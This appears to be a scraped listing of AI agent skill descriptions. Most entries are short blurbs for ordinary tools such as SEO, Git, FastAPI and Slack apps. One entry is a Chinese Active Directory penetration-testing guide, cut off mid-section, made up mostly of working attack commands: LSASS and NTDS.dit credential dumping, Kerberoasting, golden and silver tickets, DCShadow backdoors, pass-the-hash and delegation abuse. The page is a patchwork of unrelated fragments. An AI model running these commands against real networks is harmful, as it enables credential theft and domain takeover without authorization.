全部能力

When the user wants to create, optimize, or audit a comparison table section—an in-page block (HTML table or responsive equivalent) comparing products,…

Active Directory 渗透测试技术指南 ## 信息收集 ### 域基础信息 - `nltest /domain_trusts` - 查看域信任关系 - `net view /domain` - 枚举域列表 - `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - 定位域控制器 ### BloodHound 资产发现 ```powershell # SharpHound 数据收集 Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip ``` ### LDAP 查询 ```powershell # 查找域管账户 ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll() # 查找非约束委派的服务账户 Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))" ``` ## 凭据获取 ### LSASS 内存提取 ```powershell # procdump + mimikatz 离线解析 procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` ### SAM/NTDS.dit 提取 ```powershell # Volume Shadow Copy 方式 vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\ # ntdsutil 官方工具 ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q ``` ### Kerberoasting ```powershell # 请求 SPN 服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433" # Rubeus 自动化 Rubeus.exe kerberoast /outfile:hashes.txt ``` ## Kerberos 攻击 ### AS-REP Roasting ```powershell # 查找 "Do not require Kerberos preauthentication" 账户 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth # Rubeus 攻击 Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt ``` ### Golden Ticket ```powershell # 需要 krbtgt 账户的 NTLM hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt ``` ### Silver Ticket ```powershell # 针对特定服务，需要服务账户 NTLM hash mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt ``` ### DCShadow ```powershell # 需要域管权限，注册伪造 DC mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor" ``` ## 横向移动 ### Pass-the-Hash ```powershell # mimikatz sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe # Invoke-WMIExec Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..." ``` ### Over-Pass-the-Hash ```powershell # 获取 TGT 后使用正常 Kerberos 认证 Rubeus.exe asktgt /user:admin /rc4:hash /ptt ``` ### Pass-the-Ticket ```powershell # 导出票据后注入 mimikatz # sekurlsa::tickets /export mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi ``` ### 约束委派滥用 ```powershell # 配置 S4U2Self + S4U2Proxy Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt ``` ### 基于资源的约束委派 (RBCD

Verify technical accuracy of JavaScript concept pages by checking code examples, MDN/ECMAScript compliance, and external resources to prevent misinformation

Analyze Reddit threads for sentiment, consensus opinions, top arguments, and discussion patterns. Use this when users want to understand Reddit community…

Find, evaluate, and maintain high-quality external resources for JavaScript concept documentation, including auditing for broken and outdated links

通过 OpenAPI/SDK 管理阿里云内容安全（Green）。当用户需要内容安全资源和策略操作时随时使用，包括…

GEO-first SEO analysis tool. Optimizes websites for AI-powered search engines (ChatGPT, Claude, Perplexity, Gemini, Google AI Overviews) while maintaining traditional SEO foundations. Performs full GEO audits, citability scoring, AI crawler analysis, llms.txt generation, brand mention scanning, platform-specific optimization, schema markup, technical SEO, content quality (E-E-A-T), and client-ready GEO report generation. Use when user says "geo", "seo", "audit", "AI search", "AI visibility", "optimize", "citability", "llms.txt", "schema", "brand mentions", "GEO report", or any URL for analysis.

Git 버전 관리 모범 관례 및 워크플로우 가이드. 다음 상황에서 사용: (1) Git 커밋 메시지 작성 시 (Conventional Commits 규칙 적용), (2) 브랜치 생성 및 관리 시 (GitHub Flow 기반), (3) PR 생성 및 병합 전략 선택 시, (4) Git…

Guides developers and admins through direct interaction with the Fusion Help REST API — reading articles, FAQs, release notes, searching content, and managing…

Security audit and vulnerability scanner for AI agent skills before installation. Use when: (1) evaluating a skill from an untrusted source, (2) auditing a skill directory or git repo URL for malicious code, (3) pre-install security gate for Claude Code plugins, OpenClaw skills, or Codex skills, (4) scanning Python scripts for dangerous patterns like os.system, eval, subprocess, network exfiltration, (5) detecting prompt injection in SKILL.md files, (6) checking dependency supply chain risks, (7) verifying file system access stays within skill boundaries. Triggers: "audit this skill", "is this skill safe", "scan skill for security", "check skill before install", "skill security check", "skill vulnerability scan".

一键发布 Claude Code Skill 到 GitHub，自动验证、补全文件、创建仓库、推送并验证可安装。当用户说"发布这个skill"、"publish skill"、"把skill发到GitHub"、"分享这个skill"、"/publish-skill"时触发。支持发布当前目录或指定路径的 skill。

Expert-level insurance systems, underwriting, claims processing, actuarial analysis, risk assessment, and insurtech solutions

Expert SEO content strategy for SaaS and B2B sites. Use when doing keyword research, planning content clusters, creating pillar pages, optimizing on-page SEO,…

Market and engage on Reddit authentically. Use when the user says "Reddit marketing", "Reddit strategy", "promote on Reddit", "Reddit post", "subreddit…

Build Slack apps using the Bolt framework across Python, JavaScript, and Java. Covers Block Kit for rich UIs, interactive components, slash commands, event…

Use when cloud Qwen speech features are needed through DashScope, especially for ASR transcription of user audio, Telegram voice-note TTS, or reusable…

SuiteScript records and fields reference. Look up field IDs, types, required status, and search capabilities for all 272 NetSuite record types. Use this when…

Validate, lint, audit, or fix bash/shell/.sh scripts via ShellCheck.

This skill should be used when the user wants to "create a skill", "add a skill to plugin", "write a new skill", "improve skill description", "organize skill…

Build Python APIs with FastAPI, Pydantic v2, and SQLAlchemy 2.0 async. Covers project structure, JWT auth, validation, and database integration with uv package manager. Prevents 7 documented errors. Use when: creating Python APIs, implementing JWT auth, or troubleshooting 422 validation, CORS, async blocking, form data, background tasks, or OpenAPI schema errors.